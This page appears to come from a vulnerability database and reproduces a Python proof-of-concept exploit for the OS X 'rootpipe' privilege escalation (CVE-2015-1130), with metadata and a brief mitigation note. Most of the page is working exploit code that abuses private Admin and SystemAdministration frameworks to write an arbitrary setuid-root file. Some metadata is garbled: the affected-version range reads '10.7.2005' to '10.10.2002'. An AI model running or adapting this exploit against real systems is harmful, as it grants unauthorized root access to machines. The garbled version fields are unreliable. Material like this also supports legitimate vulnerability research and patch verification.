PoC exploit code for rootpipe (CVE-2015-1130)

vendor:

Mac OS X

by:

Emil Kvarnhammar

7.8

CVSS

HIGH

rootpipe

264

CWE

Product Name: Mac OS X

Affected Version From: 10.7.2005

Affected Version To: 10.10.2002

Patch Exists: YES

Related CWE: CVE-2015-1130

CPE: o:apple:mac_os_x:10.7.5

Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-adminframework-cve-2015-1130/

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2

2015

PoC exploit code for rootpipe (CVE-2015-1130)

This PoC exploit code is created by Emil Kvarnhammar, TrueSec for the rootpipe vulnerability (CVE-2015-1130). It is tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2. It uses ctypes, objc, sys, Cocoa, and Foundation libraries to write a file with the given source binary to the given destination binary as root.

Mitigation:

Apple has released a security update to address this vulnerability.

Source

Exploit-DB raw data:

########################################################
#
#  PoC exploit code for rootpipe (CVE-2015-1130)
#
#  Created by Emil Kvarnhammar, TrueSec
#
#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
import sys
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool

def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);

def use_old_api():
    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])


args = sys.argv

if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


print "Done!"

del pool